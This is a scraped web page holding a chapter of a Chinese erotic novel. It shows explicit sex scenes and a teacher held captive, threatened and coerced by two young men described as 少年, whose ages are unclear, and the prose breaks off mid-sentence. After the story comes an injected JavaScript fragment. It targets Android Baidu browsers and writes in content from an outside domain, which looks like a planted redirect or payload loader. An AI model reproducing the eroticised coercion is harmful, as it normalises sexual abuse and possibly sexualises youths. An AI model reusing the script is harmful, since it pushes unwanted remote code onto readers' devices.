逃脱 分卷阅读39

    ,但不同于纳兰荻和纳兰葎的是,他给了她更多的快感,她的身体完全主宰了她。

    男女性器交合处,她肉穴里旺盛的淫汁随着男根的出入被带出来,将雪白的床单都喷湿了。

    24-30

    “嗯~~嗯~~~~啊~~啊~~~~”蓝静仪摆着头,汗湿的黑发贴在颊上,娇弱的身体承受着少年越来越猛烈的撞击。

    “嗡~~嗡~~~”被遗落在地板上的白色手机发出震动声,轻轻地旋转着。

    可是没有人会注意这些。室内男女旖旎的交 合声完全将它遮盖了。

    纳兰荻坐在跑车的驾驶座上,一遍遍地拨打着蓝静仪的手机,手机一直无人接听。他俊美的面庞变的越来越冷酷,三三两两的学生不断从跑车旁走过,女孩子们悄悄回头打量着这个俊美的冷面王子。

    “嘟……嘟……您拨打的电话无人接听,请稍后再拨……”纳兰荻紧紧地握住手机,手指关节有些发白,终于他无法容忍,扬起手。

    “啪”手机被重重摔在便道上,四分五裂体无完肤。

    “好酷哦”校园里许多女孩子惊艳的目光向他投过来,悄悄发出惊叹。

    少年发动了车子,红色的跑车快速地倒退,一个急转,一瞬间便在女孩子们留恋的目光中绝尘而去。

    “老师呢?”纳兰葎跟上来。

    纳兰荻冰着一张脸,走进更衣室。纳兰葎推门进来,“逃掉了?”

    “她敢”

    纳兰葎轻笑,笑容妖娆邪美,“是呀,她不敢,即使敢,我也会把她抓回来,只要她还在这个世上”妖娆的俊颜下那双狭长的瞳仁却闪着冷光。

    “这些天给她自由太多了,所以她胆子越来越大”

    “根本没把我们放在眼里”笑容褪去,纳兰葎眸中一片阴冷。

    “葎,我们该怎么”奖励‘她呢?“

    “要我好好想一想”少年用手指轻抚着眉骨,面上带着妖美的轻笑,修长的手指却在一点点轻颤着,泄露了他与外表完全背离的内心。

    蓝静仪张开眼,面前的情景让她满面通红。她赤身躺在一个少年的怀里,少年年青美好的身体一丝不挂,男性欲望在梦中也在悄悄地饱涨着,俊美无俦的容颜却安然的像一个天使。

    大床上凌乱不堪,处处都显现出欢爱过后的痕迹。

    “嗯”她轻吟一声,身体一动,下体明显的传来一阵痛楚。她都做了什么?她掐住自己的额头,虽然昨晚情况并非她能控制,但她怎么能迷失在纯粹的***中呢?

    一股羞耻感涌上心头。

    蓝蕼一定不知道昨晚他对她做了什么事,他要了她,只是因为发烧过度,是少年一时的性冲动而已。她不能让他知道,不然今后她真的无法再面对他了。

    看到少年因为发烧和一夜嗜欲仍沉在睡梦中。她坐起身,轻而快速地穿好衣服。从地板上拾起手机,她看了眼屏幕。

    她的双眸立刻划过恐惧。因为她看到了二十几通未接来电,均来自于纳兰荻。

    此时,她才真正地意识到她的处境是多么危险。

    她快速地走出了卧室,颤抖的手指放在拔号键上方,咬着唇,睫毛轻颤着,可是半晌也没有按下去。她没有勇气见到他们,甚至没有勇气听到他们的声音,她不知道一夜未归的她将要面对的会是什么。

    她还是决定先回学校,尽管她知道自己不管怎样逃避,终逃不开他们的魔手。

    正在她就要走进学校的时候,忽然一辆车冲过来,还来不及反应,她已经被一双长臂掠进了汽车里。

    “啊~~纳兰葎?”看到面前一张邪美的俊脸,她停止了挣扎。

    “是我”纳兰葎脸上带着毒汁一样的笑容,他轻轻一推,将她推倒在座椅上,“乖乖给我听话,听到了吗”说完,少年打着方向盘,车子一个急转,向校园相反的方向驶去。

    “我……”蓝静仪看了一眼驾车的纳兰葎,平日多话的他今天却紧紧地闭着嘴,魅惑的俊颜带着一丝阴影,她心里有点发毛。

    “闭嘴”还没等她说完,纳兰葎就轻轻吐出两个字,“回家再解释,不然我不保证能不能把你活着带回去”

    蓝静仪轻轻打了个寒颤,咬住了唇。

    少年的面色越来越阴郁,她连开口的勇气都没有了。

    手指紧紧地抓着手机,手心里全是冷汗。

    纳兰葎拉着她走进大门。

    “回来了”一个低沉好听的男声响起来。

    她止住脚步,发现纳兰荻穿着白色睡衣站在楼口,狭长冰冷的眸子正淡淡看向她。

    她点点头。头低垂着不敢看他的眼睛。两个高大的少年一前一后站在她身边,娇小的她只及到他们的肩,她立刻有种羊落虎口的感觉。双手不禁紧紧地并拢。

    纳兰荻捏住她尖细的下巴,强迫她抬起头来与他对视。

    “玩的高兴吗?”他的黑眸紧紧逼视着她。

    蓝静仪撇开眸光,双唇开始轻轻地颤抖着。

    “怎么不说话?”少年凉淡的指肚状似无意地轻抚着她柔嫩的肌肤。

    “我……我……”她双唇颤动着,几乎说不出话来。

    “手机坏了?”纳兰葎抓过她的手,掰开她紧紧收拢的手指,将汗湿的手机拿出来。

    蓝静仪摇头。

    “既然没坏,那么收到我的电话了吗,我打了好多电话给你”少年黑眸眯起来,像极了盯住食物的豹子。

    蓝静仪惊慌地张大眼睛,她眸子里的恐惧尽数落在少年眼中。

    她轻轻颤抖着,像只落入陷井里楚楚可怜的小羊羔。这种表情,最能引发嗜血动物的兽性,让少年身体里充满暴虐的血液沸腾起来。

    “去我的卧室”纳兰荻撇头对纳兰葎说道。两个少年很默契地把她推进一个宽大的卧房里。

    蓝静仪踉跄了几步才站稳,她好奇地打量四周。她还从没进过纳兰获的卧室。卧室摆设非常简单,都是一色的白。一只铺着白色床单的大床占据了整个卧室的三分之一,白色的窗纱轻轻的合拢着,将外界的一切都阻隔出去。这里像是一个白色的天堂,干净的让人觉得站在这里都是一种亵渎。

    “坐吧”少年拍拍身边的床单。

    她看着两个少年中间为她留的狭小的位置,心里害怕着,可脚却不自觉地移过去。

    她坐下来,左右紧紧靠着两个少年的身体。一股少年身上特有的清新味道钻进她的鼻息,她有点局促不安寻扭着双手。

    “说吧”纳兰葎的气息吹拂在她脸上。

    “我们在听”纳兰荻也很好脾气地说道。

    “我……我去家访了……因为暴风雨被挡在了山上……所以晚上没有回家……”

    “获,我们的宝贝还真有责任心呢”纳兰葎轻点着头。

    “男生还是女生?”纳兰

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('